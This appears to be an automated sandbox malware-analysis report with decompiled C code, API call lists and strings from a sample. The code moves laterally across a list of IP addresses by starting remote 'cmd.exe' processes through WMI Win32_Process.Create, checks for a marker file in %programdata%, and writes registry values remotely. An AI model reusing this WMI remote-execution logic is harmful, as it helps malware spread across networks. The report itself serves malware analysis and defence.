    0x00d64be3
    0x00d64793
    0x00d64be9
    0x00d64bee
    0x00d64bf2
    0x00d64bf5
    0x00d64bfb
    0x00d64bfb
    0x00d64c01
    0x00d64c01
    0x00d64c0c
    0x00d64c24

    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 00D64635
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D6464E
    • CredUIParseUserNameW.CREDUI(?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D64682
    • LocalAlloc.KERNEL32(00000040,0000001C,?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D6468C
    • SysAllocString.OLEAUT32(?), ref: 00D646A5
    • SysAllocString.OLEAUT32(?), ref: 00D646AE
    • SysAllocString.OLEAUT32(?), ref: 00D646B9
    • SysStringLen.OLEAUT32(00000000), ref: 00D646C4
    • SysStringLen.OLEAUT32(?), ref: 00D646DD
    • SysStringLen.OLEAUT32(00000000), ref: 00D646E6
    • CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D64707
    • wsprintfW.USER32 ref: 00D6472D
    • SysAllocString.OLEAUT32(?), ref: 00D64743
    • SysAllocString.OLEAUT32(?), ref: 00D6474D
    • SysAllocString.OLEAUT32(?), ref: 00D64757
    • SysFreeString.OLEAUT32(?,00000000), ref: 00D64782
    • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D647AC
    • SysFreeString.OLEAUT32(?), ref: 00D64BC0
      • Part of subcall function 00D6B9C0: MultiByteToWideChar.KERNEL32(00000000,00000000,00D64853,00D64855,00000000,00000000,276B9783,00000000,00000000,76FD3F8A,Function_0000D240,00D86878,000000FE,?,00D64853,WQL), ref: 00D6BA3A
      • Part of subcall function 00D6B9C0: GetLastError.KERNEL32(?,00D64853,WQL,?,?), ref: 00D6BA49
      • Part of subcall function 00D6B9C0: __alloca_probe_16.NTDLLP ref: 00D6BA73
      • Part of subcall function 00D6B9C0: MultiByteToWideChar.KERNEL32(00000000,00000000,00D64853,?,00000000,00000000,?,?,?,?,?,00D64853), ref: 00D6BAD3
      • Part of subcall function 00D6B9C0: GetLastError.KERNEL32(?,?,?,?,?,00D64853), ref: 00D6BAEE
      • Part of subcall function 00D6B9C0: SysAllocString.OLEAUT32(00000000), ref: 00D6BB07
    • InterlockedDecrement.KERNEL32(00000008), ref: 00D64894
    • SysFreeString.OLEAUT32(00000000), ref: 00D648A5
    • InterlockedDecrement.KERNEL32(00000008), ref: 00D648DA
    • SysFreeString.OLEAUT32(00000000), ref: 00D648EB
    • CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D6492E
    • SysAllocString.OLEAUT32(Create), ref: 00D64955
    • SysAllocString.OLEAUT32(Win32_Process), ref: 00D64962
    • SysAllocString.OLEAUT32(?), ref: 00D64A06
    • VariantClear.OLEAUT32(?), ref: 00D64B3D
    • VariantClear.OLEAUT32(?), ref: 00D64B46
    • VariantClear.OLEAUT32(?), ref: 00D64B69
    • SysFreeString.OLEAUT32(?), ref: 00D64B7D
    • VariantClear.OLEAUT32(?), ref: 00D64B86
    • SysFreeString.OLEAUT32(?), ref: 00D64BB8
    • SysFreeString.OLEAUT32(?), ref: 00D64BE9
    • SysFreeString.OLEAUT32(?), ref: 00D64BEE
    • SysFreeString.OLEAUT32(?), ref: 00D64BF2
    • LocalFree.KERNEL32(?,?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D64BF5
    • CoUninitialize.OLE32 ref: 00D64C01
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D65170, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 251

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 185 d65170-d651ac 186 d654ae 185->186 187 d651b2-d651b4 185->187 189 d654b3-d654ce call d6abe4 186->189 187->186 188 d651ba-d651c6 187->188 188->186 191 d651cc-d6529d call d6d520 call d619f0 call d6d520 * 2 InitializeCriticalSection call d67570 188->191 203 d6547c-d654a2 DeleteCriticalSection call d68340 191->203 204 d652a3 191->204 203->189 205 d652a9-d652d4 MultiByteToWideChar 204->205 207 d65305-d6530d 205->207 208 d652d6-d652ff call d702c9 MultiByteToWideChar 205->208 210 d6530f-d6531b 207->210 211 d6532f 207->211 208->207 210->211 214 d6531d-d6531f 210->214 213 d65331-d6534b MultiByteToWideChar 211->213 216 d65370-d6537e 213->216 217 d6534d-d6536e call d702c9 MultiByteToWideChar 213->217 218 d654a4-d654a9 call d6b97b 214->218 219 d65325-d6532d 214->219 221 d653a0 216->221 222 d65380-d6538c 216->222 217->216 218->186 219->213 226 d653a2-d653c5 MultiByteToWideChar 221->226 222->221 224 d6538e-d65390 222->224 224->218 227 d65396-d6539e 224->227 228 d653ee-d65412 call d645d0 226->228 229 d653c7-d653e8 call d702c9 MultiByteToWideChar 226->229 227->226 234 d6543f-d65476 call d7009a * 3 228->234 235 d65414-d65437 call d64c30 call d645d0 228->235 229->228 234->203 234->205 243 d6543c 235->243 243->234
    C-Code - Quality: 67%
    			E00D65170(void* __ebx, short* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v276;
				char _v531;
				char _v532;
				char _v788;
				char* _v792;
				short* _v796;
				int _v800;
				int _v804;
				void* _v808;
				int _v812;
				struct _CRITICAL_SECTION _v836;
				int _v840;
				int _v844;
				int _v848;
				void* __ebp;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t67;
				intOrPtr* _t86;
				int _t92;
				intOrPtr* _t93;
				char* _t94;
				int _t95;
				intOrPtr* _t97;
				void* _t98;
				char* _t99;
				int _t100;
				intOrPtr* _t106;
				short* _t110;
				signed int _t114;
				short* _t117;
				signed int _t121;
				short* _t124;
				intOrPtr* _t128;
				short* _t131;
				intOrPtr _t148;
				intOrPtr _t150;
				unsigned int _t153;
				int _t163;
				signed int _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				_t158 = __edi;
				_push(0xffffffff);
				_push(E00D7E31B);
				_push( *[fs:0x0]);
				_t166 = _t165 - 0x340;
				_t64 =  *0xd88004; // 0x276b9783
				_t65 = _t64 ^ _t164;
				_v20 = _t65;
				_push(__edi);
				_push(_t65);
				 *[fs:0x0] =  &_v16;
				_t67 = _a4;
				_t128 = _a8;
				_v808 = _t128;
				if(_t67 != 0 && _t128 != 0) {
					_v792 =  *_t67;
					if( *((intOrPtr*)(_t128 + 0x24)) == 0) {
						goto L26;
					} else {
						E00D6D520(__edi,  &_v276, 0, 0x100);
						_t153 = _v792;
						_push(_t153 & 0x000000ff);
						_push(_t153 >> 0x00000008 & 0x000000ff);
						_push(_t153 >> 0x00000010 & 0x000000ff);
						E00D619F0( &_v276, "%d.%d.%d.%d", _t153 >> 0x00000010 >> 0x00000008 & 0x000000ff);
						E00D6D520(_t158,  &_v788, 0, 0x100);
						_v532 = 0;
						E00D6D520(_t158,  &_v531, 0, 0xff);
						_t167 = _t166 + 0x3c;
						_v848 = 0;
						_v840 = 0;
						_v844 = 0;
						InitializeCriticalSection( &_v836);
						_v8 = 0;
						E00D67570( &_v848,  &_v788);
						_t86 =  *_t128;
						_t163 = 0;
						_v804 = 0;
						_t142 =  *((intOrPtr*)(_t86 + 4)) -  *_t86 >> 9;
						if( *((intOrPtr*)(_t86 + 4)) -  *_t86 >> 9 == 0) {
							L24:
							_v844 = _v848;
							DeleteCriticalSection( &_v836);
							E00D68340(_t128,  &_v848, _t158);
						} else {
							_v800 = 0;
							do {
								_v796 = 0;
								_t92 = MultiByteToWideChar(0, 8,  &_v276, 0xffffffff, 0, 0);
								_v792 = _t92;
								if(_t92 != 0) {
									_push(_t92 + _t92);
									_t124 = E00D702C9(_t142);
									_t167 = _t167 + 4;
									_t131 = _t124;
									_v796 = _t131;
									MultiByteToWideChar(0, 8,  &_v276, 0xffffffff, _t131, _v792);
									_t128 = _v808;
								}
								_t93 =  *_t128;
								if(_t163 > 0xffffff) {
									L11:
									_t94 = 0;
									goto L12;
								} else {
									_t150 =  *_t93;
									_t121 =  *((intOrPtr*)(_t93 + 4)) - _t150 >> 9;
									if(_t163 >= _t121) {
										goto L11;
									} else {
										if(_t121 <= _t163) {
											L25:
											E00D6B97B("invalid vector<T> subscript");
											goto L26;
										} else {
											_t94 = _v800 + _t150;
											L12:
											_t130 = 0;
											_v792 = _t94;
											_t95 = MultiByteToWideChar(0, 8, _t94, 0xffffffff, 0, 0);
											_v812 = _t95;
											if(_t95 != 0) {
												_push(_t95 + _t95);
												_t117 = E00D702C9(_t95 + _t95);
												_t167 = _t167 + 4;
												_t130 = _t117;
												MultiByteToWideChar(0, 8, _v792, 0xffffffff, _t117, _v812);
											}
											_t97 =  *_v808;
											if(_t163 > 0xffffff) {
												L18:
												_t98 = 0;
												goto L19;
											} else {
												_t148 =  *_t97;
												_t114 =  *((intOrPtr*)(_t97 + 4)) - _t148 >> 9;
												if(_t163 >= _t114) {
													goto L18;
												} else {
													if(_t114 <= _t163) {
														goto L25;
													} else {
														_t98 = _v800 + _t148;
														goto L19;
													}
												}
											}
										}
									}
								}
								goto L27;
								L19:
								_t158 = 0;
								_t99 = _t98 + 0x100;
								_v792 = _t99;
								_t100 = MultiByteToWideChar(0, 8, _t99, 0xffffffff, 0, 0);
								_v812 = _t100;
								if(_t100 != 0) {
									_push(_t100 + _t100);
									_t110 = E00D702C9(_t100 + _t100);
									_t167 = _t167 + 4;
									_t158 = _t110;
									MultiByteToWideChar(0, 8, _v792, 0xffffffff, _t158, _v812);
								}
								E00D645D0(_t130, _v796, _t130, _t158, _t163, _t158, L"cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\\evtchk.txt (exit 5) else ( type nul > %programdata%\\evtchk.txt)",  &_v804); // executed
								_t168 = _t167 + 0xc;
								if(_v804 == 0) {
									_push(_t158); // executed
									E00D64C30(_t130, _v796, _t130, _t158, _t163); // executed
									E00D645D0(_t130, _v796, _t130, _t158, _t163, _t158, L"del %programdata%\\evtchk.txt",  &_v804); // executed
									_t168 = _t168 + 0x10;
								}
								E00D7009A(_v796);
								E00D7009A(_t130);
								E00D7009A(_t158);
								_t128 = _v808;
								_t163 = _t163 + 1;
								_v800 = _v800 + 0x200;
								_t167 = _t168 + 0xc;
								_t106 =  *_t128;
								_t142 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 9;
							} while (_t163 <  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 9);
							goto L24;
						}
					}
				}
				L27:
				 *[fs:0x0] = _v16;
				return E00D6ABE4(_v20 ^ _t164);
			}


















































    0x00d65170
    0x00d65173
    0x00d65175
    0x00d65180
    0x00d65181
    0x00d65187
    0x00d6518c
    0x00d6518e
    0x00d65193
    0x00d65194
    0x00d65198
    0x00d6519e
    0x00d651a1
    0x00d651a4
    0x00d651ac
    0x00d651c0
    0x00d651c6
    0x00000000
    0x00d651cc
    0x00d651da
    0x00d651df
    0x00d651ea
    0x00d651f1
    0x00d651f8
    0x00d6520c
    0x00d6521f
    0x00d6522f
    0x00d65239
    0x00d6523e
    0x00d65241
    0x00d65251
    0x00d6525b
    0x00d65266
    0x00d65272
    0x00d65280
    0x00d65285
    0x00d65287
    0x00d65289
    0x00d65298
    0x00d6529d
    0x00d6547c
    0x00d65482
    0x00d6548f
    0x00d6549b
    0x00d652a3
    0x00d652a3
    0x00d652a9
    0x00d652c0
    0x00d652ca
    0x00d652cc
    0x00d652d4
    0x00d652d8
    0x00d652d9
    0x00d652de
    0x00d652e1
    0x00d652e9
    0x00d652fd
    0x00d652ff
    0x00d652ff
    0x00d65305
    0x00d6530d
    0x00d6532f
    0x00d6532f
    0x00000000
    0x00d6530f
    0x00d6530f
    0x00d65316
    0x00d6531b
    0x00000000
    0x00d6531d
    0x00d6531f
    0x00d654a4
    0x00d654a9
    0x00000000
    0x00d65325
    0x00d6532b
    0x00d65331
    0x00d65331
    0x00d65333
    0x00d65341
    0x00d65343
    0x00d6534b
    0x00d65350
    0x00d65351
    0x00d65356
    0x00d65359
    0x00d6536e
    0x00d6536e
    0x00d65376
    0x00d6537e
    0x00d653a0
    0x00d653a0
    0x00000000
    0x00d65380
    0x00d65380
    0x00d65387
    0x00d6538c
    0x00000000
    0x00d6538e
    0x00d65390
    0x00000000
    0x00d65396
    0x00d6539c
    0x00000000
    0x00d6539c
    0x00d65390
    0x00d6538c
    0x00d6537e
    0x00d6531f
    0x00d6531b
    0x00000000
    0x00d653a2
    0x00d653a2
    0x00d653a4
    0x00d653b1
    0x00d653b7
    0x00d653bd
    0x00d653c5
    0x00d653ca
    0x00d653cb
    0x00d653d0
    0x00d653d3
    0x00d653e8
    0x00d653e8
    0x00d65403
    0x00d65408
    0x00d65412
    0x00d6541c
    0x00d6541d
    0x00d65437
    0x00d6543c
    0x00d6543c
    0x00d65445
    0x00d6544b
    0x00d65451
    0x00d65456
    0x00d6545c
    0x00d6545d
    0x00d65467
    0x00d6546a
    0x00d65471
    0x00d65474
    0x00000000
    0x00d652a9
    0x00d6529d
    0x00d651c6
    0x00d654b3
    0x00d654b6
    0x00d654ce

    APIs
    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,276B9783), ref: 00D65266
      • Part of subcall function 00D67570: EnterCriticalSection.KERNEL32(?,?,?,00D8891F,?,00D624D5,?,00000000,00D6209E), ref: 00D6758E
      • Part of subcall function 00D67570: LeaveCriticalSection.KERNEL32(00D624D5,?,00D624D5,?,00000000,00D6209E), ref: 00D675E6
    • MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,00000000,?), ref: 00D652CA
    • MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,?), ref: 00D652FD
    • MultiByteToWideChar.KERNEL32(00000000,00000008,00000000,000000FF,00000000,00000000), ref: 00D65341
    • MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,?), ref: 00D6536E
    • MultiByteToWideChar.KERNEL32(00000000,00000008,-00000100,000000FF,00000000,00000000), ref: 00D653B7
      • Part of subcall function 00D645D0: CoInitializeEx.OLE32(00000000,00000000), ref: 00D64635
      • Part of subcall function 00D645D0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D6464E
      • Part of subcall function 00D645D0: CredUIParseUserNameW.CREDUI(?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D64682
      • Part of subcall function 00D645D0: LocalAlloc.KERNEL32(00000040,0000001C,?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D6468C
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D646A5
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D646AE
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D646B9
      • Part of subcall function 00D645D0: SysStringLen.OLEAUT32(00000000), ref: 00D646C4
      • Part of subcall function 00D645D0: SysStringLen.OLEAUT32(?), ref: 00D646DD
      • Part of subcall function 00D645D0: SysStringLen.OLEAUT32(00000000), ref: 00D646E6
      • Part of subcall function 00D645D0: CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D64707
      • Part of subcall function 00D645D0: wsprintfW.USER32 ref: 00D6472D
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D64743
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D6474D
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D64757
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?,00000000), ref: 00D64782
      • Part of subcall function 00D645D0: CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D647AC
      • Part of subcall function 00D645D0: InterlockedDecrement.KERNEL32(00000008), ref: 00D64894
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(00000000), ref: 00D648A5
      • Part of subcall function 00D645D0: InterlockedDecrement.KERNEL32(00000008), ref: 00D648DA
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(00000000), ref: 00D648EB
      • Part of subcall function 00D645D0: CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D6492E
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(Create), ref: 00D64955
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(Win32_Process), ref: 00D64962
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D64A06
      • Part of subcall function 00D645D0: VariantClear.OLEAUT32(?), ref: 00D64B3D
      • Part of subcall function 00D645D0: VariantClear.OLEAUT32(?), ref: 00D64B46
      • Part of subcall function 00D645D0: VariantClear.OLEAUT32(?), ref: 00D64B69
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64B7D
      • Part of subcall function 00D645D0: VariantClear.OLEAUT32(?), ref: 00D64B86
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BB8
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BC0
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BE9
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BEE
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BF2
      • Part of subcall function 00D645D0: LocalFree.KERNEL32(?,?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D64BF5
      • Part of subcall function 00D645D0: CoUninitialize.OLE32 ref: 00D64C01
    • MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,?), ref: 00D653E8
      • Part of subcall function 00D64C30: CoInitializeEx.OLE32(00000000,00000000), ref: 00D64C66
      • Part of subcall function 00D64C30: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D64C86
      • Part of subcall function 00D64C30: CredUIParseUserNameW.CREDUI(?,?,00000201,?,?,?,?,?,?,?,?,?,?,?,00000151), ref: 00D64CBE
      • Part of subcall function 00D64C30: LocalAlloc.KERNEL32(00000040,0000001C,?,?,00000201,?), ref: 00D64CC8
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64CE0
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64CE7
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64CF3
      • Part of subcall function 00D64C30: SysStringLen.OLEAUT32(00000000), ref: 00D64CFE
      • Part of subcall function 00D64C30: SysStringLen.OLEAUT32(?), ref: 00D64D13
      • Part of subcall function 00D64C30: SysStringLen.OLEAUT32(00000000), ref: 00D64D1C
      • Part of subcall function 00D64C30: CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D64D3B
      • Part of subcall function 00D64C30: wsprintfW.USER32 ref: 00D64D5D
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64D71
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64D7B
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64D85
      • Part of subcall function 00D64C30: CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D64DD2
      • Part of subcall function 00D64C30: CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D64E0C
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(SetBinaryValue), ref: 00D64E17
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(StdRegProv), ref: 00D64E22
      • Part of subcall function 00D64C30: VariantClear.OLEAUT32(?), ref: 00D64EA1
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(00000000), ref: 00D6510F
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(00000000), ref: 00D65112
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D65122
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D65128
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D6512E
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D6513D
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D65142
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D65146
      • Part of subcall function 00D64C30: LocalFree.KERNEL32(?,?,?,00000201,?,?,?,?,?,?,?,?,?,?,?,00000151), ref: 00D65149
      • Part of subcall function 00D64C30: CoUninitialize.OLE32 ref: 00D6514F
      • Part of subcall function 00D6B97B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D6B987
    • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,276B9783), ref: 00D6548F
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    • cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\evtchk.txt (exit 5) else ( type nul > %programdata%\evtchk.txt), xrefs: 00D653FB
    • invalid vector<T> subscript, xrefs: 00D654A4
    • %d.%d.%d.%d, xrefs: 00D65206
    • del %programdata%\evtchk.txt, xrefs: 00D6542F
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D660F0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 193library

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 246 d660f0-d6611c 247 d66157-d6615f 246->247 248 d6611e-d66149 call d6d520 GetVersionExW 246->248 249 d66161-d6618c call d6d520 GetVersionExW 247->249 250 d6619e-d661b9 GetModuleHandleA GetProcAddress 247->250 248->247 256 d6614b-d66155 248->256 249->250 260 d6618e-d6619c 249->260 253 d661bb-d661be 250->253 254 d661c0-d661eb GetCurrentProcess IsWow64Process 250->254 257 d661ee-d66252 call d62eb0 call d6eab8 * 2 253->257 254->257 256->247 266 d66254-d66257 257->266 267 d66269-d66271 257->267 260->250 266->267 268 d66259-d6625e 266->268 269 d66288-d6628e 267->269 270 d66273-d66276 267->270 268->267 271 d66260-d66266 call d7009a 268->271 272 d66290-d66295 269->272 270->269 273 d66278-d6627d 270->273 271->267 272->272 274 d66297-d66299 272->274 273->269 275 d6627f-d66285 call d7009a 273->275 277 d662a0-d662a6 274->277 275->269 277->277 280 d662a8-d662c4 277->280 282 d662c7-d662cf 280->282 282->282 283 d662d1-d662e0 282->283 284 d662e2-d662e7 283->284 284->284 285 d662e9-d662ec 284->285 286 d662f0-d662f6 285->286 286->286 287 d662f8-d66321 call d629d0 call d62920 286->287 292 d66326-d6633c 287->292 293 d66367-d66381 call d6abe4 292->293 294 d6633e-d66341 292->294 296 d66343-d6634a 294->296 297 d6634c-d66366 call d6abe4 294->297 296->293 296->297
    C-Code - Quality: 86%
    			E00D660F0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				signed int _v8;
				void* _v280;
				struct _OSVERSIONINFOW _v284;
				void* _v556;
				struct _OSVERSIONINFOW _v560;
				char _v564;
				char _v568;
				signed int _v572;
				intOrPtr _v576;
				char _v580;
				signed int _t50;
				intOrPtr _t58;
				intOrPtr _t63;
				intOrPtr _t64;
				void _t65;
				void _t66;
				intOrPtr _t69;
				short _t70;
				void _t71;
				void _t72;
				int _t93;
				void* _t96;
				void* _t97;
				signed int _t98;
				intOrPtr _t99;
				void* _t103;
				signed int _t105;
				void* _t110;
				void* _t111;
				signed int _t113;
				intOrPtr _t120;
				void* _t126;
				signed int _t127;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr* _t132;
				short* _t138;
				intOrPtr _t145;
				void* _t146;
				void* _t147;
				signed int _t148;
				void* _t149;
				void* _t150;

				_t50 =  *0xd88004; // 0x276b9783
				_v8 = _t50 ^ _t148;
				_t96 = GetVersionExW;
				_t145 = __ecx;
				_v576 = __ecx;
				_t130 = __ecx + 0x15b8;
				if(_t130 != 0) {
					E00D6D520(_t130,  &_v284, 0, 0x114);
					_t149 = _t149 + 0xc;
					_v284.dwOSVersionInfoSize = 0x114;
					_t93 = GetVersionExW( &_v284);
					if(_t93 != 0) {
						asm("sbb eax, eax");
						 *_t130 = _t93 + 1;
					}
				}
				_t131 = _t145 + 0x15bc;
				if(_t131 != 0) {
					E00D6D520(_t131,  &_v560, 0, 0x114);
					_t149 = _t149 + 0xc;
					_v560.dwOSVersionInfoSize = 0x114;
					if(GetVersionExW( &_v560) != 0) {
						asm("sbb eax, eax");
						 *_t131 = 6;
					}
				}
				_t132 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				_t163 = _t132;
				if(_t132 != 0) {
					_v572 = 0;
					 *_t132(GetCurrentProcess(),  &_v572); // executed
					__eflags = _v572;
					_t58 =  !=  ? 0x40 : 0x20;
				} else {
					_t13 = _t132 + 0x20; // 0x20
					_t58 = _t13;
				}
				 *((intOrPtr*)(_t145 + 0x15b4)) = _t58;
				_v564 = 0;
				_v568 = 0;
				E00D62EB0(_t96,  &_v564,  &_v568, _t132, _t145, _t163); // executed
				E00D6EAB8(_t145 + 0x12b4, _v568, 0xff);
				_t97 = _t145 + 0x11b4;
				E00D6EAB8(_t97, _v564, 0xff);
				_t63 = _v564;
				_t150 = _t149 + 0x18;
				if(_t63 != 0 && _t63 != 0xffffffff && _t63 != 0xcccccccc) {
					E00D7009A(_t63);
					_t150 = _t150 + 4;
				}
				_t64 = _v568;
				if(_t64 != 0 && _t64 != 0xffffffff && _t64 != 0xcccccccc) {
					E00D7009A(_t64);
					_t150 = _t150 + 4;
				}
				_t103 = _t145 + 0x13b3;
				_t146 = _t97;
				goto L18;
				do {
					L20:
					_t66 =  *(_t103 + 1);
					_t103 = _t103 + 1;
				} while (_t66 != 0);
				_t105 = _t98 >> 2;
				memcpy(_t103, _t146, _t105 << 2);
				_t99 = _v576;
				memcpy(_t146 + _t105 + _t105, _t146, _t98 & 0x00000003);
				_t110 = _t99 + 0x13b4;
				_t138 = _t110 - 1;
				do {
					_t69 =  *((intOrPtr*)(_t138 + 1));
					_t138 = _t138 + 1;
				} while (_t69 != 0);
				_t70 = "\\"; // 0x5c
				_t126 = _t99 + 0x12b4;
				 *_t138 = _t70;
				_t147 = _t126;
				do {
					_t71 =  *_t126;
					_t126 = _t126 + 1;
				} while (_t71 != 0);
				_t127 = _t126 - _t147;
				_t111 = _t110 - 1;
				do {
					_t72 =  *(_t111 + 1);
					_t111 = _t111 + 1;
					_t177 = _t72;
				} while (_t72 != 0);
				_t113 = _t127 >> 2;
				memcpy(_t111, _t147, _t113 << 2);
				memcpy(_t147 + _t113 + _t113, _t147, _t127 & 0x00000003);
				E00D629D0(_t99 + 0x15c0, _t177); // executed
				E00D62920(_t99, GetCurrentProcess(),  &_v580, _t177); // executed
				_t120 = _v580;
				 *(_t99 + 0x15c8) = 0 | _t120 == 0x00000002;
				if(_t120 == 0 || _t120 == 1 &&  *((intOrPtr*)(_t99 + 0x15c0)) != 0) {
					 *((intOrPtr*)(_t99 + 0x15c4)) = 1;
					__eflags = _v8 ^ _t148;
					return E00D6ABE4(_v8 ^ _t148);
				} else {
					 *((intOrPtr*)(_t99 + 0x15c4)) = 0;
					return E00D6ABE4(_v8 ^ _t148);
				}
				L18:
				_t65 =  *_t97;
				_t97 = _t97 + 1;
				if(_t65 != 0) {
					goto L18;
				} else {
					_t98 = _t97 - _t146;
					goto L20;
				}
			}














































    0x00d660f9
    0x00d66100
    0x00d66104
    0x00d6610b
    0x00d6610e
    0x00d66114
    0x00d6611c
    0x00d6612c
    0x00d66131
    0x00d66134
    0x00d66145
    0x00d66149
    0x00d66152
    0x00d66155
    0x00d66155
    0x00d66149
    0x00d66157
    0x00d6615f
    0x00d6616f
    0x00d66174
    0x00d66177
    0x00d6618c
    0x00d66199
    0x00d6619c
    0x00d6619c
    0x00d6618c
    0x00d661b5
    0x00d661b7
    0x00d661b9
    0x00d661c6
    0x00d661d8
    0x00d661da
    0x00d661eb
    0x00d661bb
    0x00d661bb
    0x00d661bb
    0x00d661bb
